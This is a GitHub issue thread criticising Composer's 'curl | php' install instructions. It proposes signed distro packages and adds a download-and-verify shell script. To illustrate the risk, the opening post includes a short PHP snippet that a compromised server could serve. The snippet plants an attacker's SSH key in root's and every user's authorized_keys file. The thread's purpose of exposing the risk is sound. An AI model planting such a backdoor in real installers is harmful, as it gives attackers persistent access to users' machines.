composer: Bad Security Habits

https://getcomposer.org/download/ “Run this in your terminal to get the latest Composer version:”

curl -sS https://getcomposer.org/installer | php

Okay, does anyone else see how this could possibly be a bad habit for users to get into?

Steps to exploit:

  1. Hack getcomposer.org
  2. Serve something like this instead of the standard installer:
<?php
if( `whoami` !== 'root' ) {
    die("Permission denied. Try running with sudo");
}
file_put_contents("/root/.ssh/authorized_keys", $attacker_rsa_pub);
chdir("/home");
foreach(glob("*") as $d) {
    if(is_dir($d)) {
        file_put_contents("/home/{$d}/.ssh/authorized_keys", $attacker_rsa_pub);
    }
}
// Rest of composer code below
?>

Solution: Submit a cryptographically signed package for inclusion in repositories (Debian, Ubuntu, etc.). Replace your instructions with something like:

sudo apt-get install composer
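The download-then-verify pattern that the post's alternatives share, as an added example in POSIX shell that is not from Composer or the issue author: the installer is saved to a file, its digest is checked against a value pinned from a source independent of the download server (a distro package's signed metadata, a checksum recorded in your own deployment repo), and it is executed only on a match. The `getcomposer.org` URL is used only as the illustrative target; the digest in the comments belongs to a constructed sample file, not to any real installer.

```shell
#!/bin/sh
# Download, verify, then run: the alternative to `curl ... | php`.
# The expected digest must NOT come from the same server as the file;
# a compromised server can change both, which is the thread's point.

# sha256_of FILE: print the hex SHA-256 digest of FILE.
# Falls back to shasum for systems without sha256sum (assumption: one exists).
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# verify_sha256 FILE EXPECTED_HEX: exit 0 on match, 1 otherwise.
verify_sha256() {
    [ "$(sha256_of "$1")" = "$2" ]
}

# fetch_verify_run URL EXPECTED_HEX
# Saves the installer to a temp file and refuses to run it unless the
# digest matches; the network stream never reaches the interpreter directly.
fetch_verify_run() {
    url="$1"
    expected="$2"
    tmp=$(mktemp) || return 1
    curl -sS -o "$tmp" "$url" || { rm -f "$tmp"; return 1; }
    if verify_sha256 "$tmp" "$expected"; then
        php "$tmp"
        rc=$?
    else
        echo "installer digest mismatch; refusing to run" >&2
        rc=1
    fi
    rm -f "$tmp"
    return $rc
}

# Example call with a placeholder digest (constructed, not a real value):
# fetch_verify_run https://getcomposer.org/installer <PINNED_SHA256_HEX>
```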

About this issue

  • State: closed
  • Created 10 years ago
  • Comments: 31 (16 by maintainers)

Most upvoted comments

@Seldaek I’m not sure what the point of the new instructions is. Both the instructions and the installer come from the same server, so if it’s compromised, so is the hash in the instructions. It seems to me that’s just making the installation more complicated without any gain in security?